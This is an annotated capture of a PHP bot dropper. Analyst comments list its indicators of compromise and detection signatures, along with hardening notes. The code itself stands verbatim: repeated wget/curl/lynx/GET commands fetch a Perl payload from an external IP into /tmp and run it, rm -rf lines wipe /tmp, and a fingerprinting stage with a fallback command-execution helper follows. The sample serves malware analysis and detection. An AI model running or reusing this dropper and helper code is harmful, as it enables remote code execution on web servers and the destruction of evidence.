
id.txt - Bot fetcher



// Captured sample, kept verbatim for analysis. Do not run it.
//
// What the lines below do: each download line changes into /tmp, invokes one
// download tool (wget, curl, lwp-download, lynx, fetch, GET) against the same
// remote file, passes sela.txt to perl, and then removes sela.txt. The same
// ten-line group is repeated for four PHP command-execution functions
// (shell_exec, passthru, exec, system), so the script does not depend on any
// single function or any single download tool being usable.
//
// Indicators visible in this listing (useful for log and proxy searches):
//   - remote host 148.245.107.2, path /.ssh/sela.txt
//   - file name sela.txt created in /tmp and handed to perl
//   - one line in the system() group points at http://ehost/~x/sela.txt instead;
//     this looks like a placeholder or a redaction - confirm against the original capture
//
// Forensics note: every group ends with rm -rf on /tmp/* and /tmp/*.txt variants.
// That removes the fetched file and anything else the executing user can delete
// in /tmp, so on-disk evidence there may already be gone; rely on web server
// access logs, process accounting/auditd and outbound connection logs instead.
//
// Sample integrity note: the first exec() line is missing its closing double
// quote as captured. It is preserved as-is; the listing is not expected to
// parse cleanly as PHP.
shell_exec("cd /tmp; wget http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt");
shell_exec('cd /tmp;curl -O http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
shell_exec('cd /tmp;lwp-download http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
shell_exec('cd /tmp;lynx -source http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
shell_exec('cd /tmp;fetch http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
shell_exec('cd /tmp;GET http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
shell_exec('rm -rf /tmp/*');
shell_exec('rm -rf /tmp/*.txt');
shell_exec('rm -rf /tmp/*.txt*');
shell_exec('rm -rf /tmp/*.txt.*');
passthru("cd /tmp; wget http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt");
passthru('cd /tmp;curl -O http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
passthru('cd /tmp;lwp-download http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
passthru('cd /tmp;lynx -source http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
passthru('cd /tmp;fetch http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
passthru('cd /tmp;GET http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
passthru('rm -rf /tmp/*');
passthru('rm -rf /tmp/*.txt');
passthru('rm -rf /tmp/*.txt*');
passthru('rm -rf /tmp/*.txt.*');
exec("cd /tmp; wget http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt);
exec('cd /tmp;curl -O http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
exec('cd /tmp;lwp-download http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
exec('cd /tmp;lynx -source http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
exec('cd /tmp;fetch http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
exec('cd /tmp;GET http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
exec('rm -rf /tmp/*');
exec('rm -rf /tmp/*.txt');
exec('rm -rf /tmp/*.txt*');
exec('rm -rf /tmp/*.txt.*');
system("cd /tmp; wget http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt");
system('cd /tmp;curl -O http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
system('cd /tmp;lwp-download http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
system('cd /tmp;lynx -source http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
system('cd /tmp;fetch http://148.245.107.2/.ssh/sela.txt;perl sela.txt;rm -rf sela.txt');
system('cd /tmp;GET http://ehost/~x/sela.txt;perl sela.txt;rm -rf sela.txt');
system('rm -rf /tmp/*');
system('rm -rf /tmp/*.txt');
system('rm -rf /tmp/*.txt*');
system('rm -rf /tmp/*.txt.*');

?>


<?
// Fingerprinting stage of the captured sample: it prints host details and the
// output of the id command into the HTTP response. The @ prefix used throughout
// suppresses PHP error output for that call.
//
// Detection note: the response body produced here has a fixed shape - the
// literal marker 31337, then OSTYPE:, Kernel:, Free:, Calkowita:, Funkcje:
// labels, then id output (uid=/gid=). Matching that sequence in outbound
// responses or in proxy/WAF logs is a practical signature for this sample.

// Working directory of the script; later used as the path for the disk-space queries.
$dir = @getcwd();
// Operating system / kernel description string as reported by PHP.
$ker = @php_uname();
// The disable_functions setting, i.e. which PHP functions the host has turned off.
$disablefunc = @ini_get("disable_functions");





// Fixed marker string; presumably lets whoever sent the request confirm that
// the included code actually executed - not verifiable from this listing.
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
// Free space on the volume holding $dir; a FALSE or negative result is normalised to 0.
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
// Total size of the same volume; any falsy result becomes 0.
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
echo "Free:".view_size($free)."<br>";
// "Calkowita" and "Funkcje" are Polish labels (roughly "total" and "functions").
echo 'Calkowita:'.view_size($all).'<br>';
echo 'Funkcje:'.$disablefunc.'<br>';
// Runs the id command through ex() and prints the result, which discloses the
// account the PHP interpreter is running as.
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
/**
 * Command-execution helper from the captured sample: runs $cfe as a shell
 * command and returns whatever it printed.
 *
 * It walks a fallback chain and uses the first primitive that is available:
 * exec, shell_exec, system, passthru, and finally popen.
 *
 * Hardening note: because of that chain, turning off only some of these
 * functions does not stop the helper - all five would have to be unavailable
 * for it to return nothing.
 *
 * @param string $cfe Command line to run; an empty value short-circuits.
 * @return string Captured output, or '' when $cfe is empty or no primitive is usable.
 */
function ex($cfe){
$res = '';
if (!empty($cfe)){
// function_exists() is the availability probe for each primitive;
// presumably this is how the sample skips functions the host has disabled.
if(function_exists('exec')){
// exec() fills $res with an array of output lines, which are then rejoined.
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
// system() writes straight to the output stream, so output buffering is
// used to capture it and then discard the buffer.
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
// Same buffering approach as the system() branch.
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
// Last resort: open the command as a read pipe and drain it in 1024-byte reads.
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
/**
 * Formats a byte count as a human-readable string. In this sample it is only
 * used to print the free and total disk space in the fingerprint output.
 *
 * @param mixed $size Byte count.
 * @return string|false The value with a " GB", " MB", " KB" or " B" suffix,
 *                      or FALSE when $size is not numeric.
 */
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
// Thresholds are binary units: 1073741824 = 1024^3, 1048576 = 1024^2.
// round(x*100)/100 keeps at most two decimal places.
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
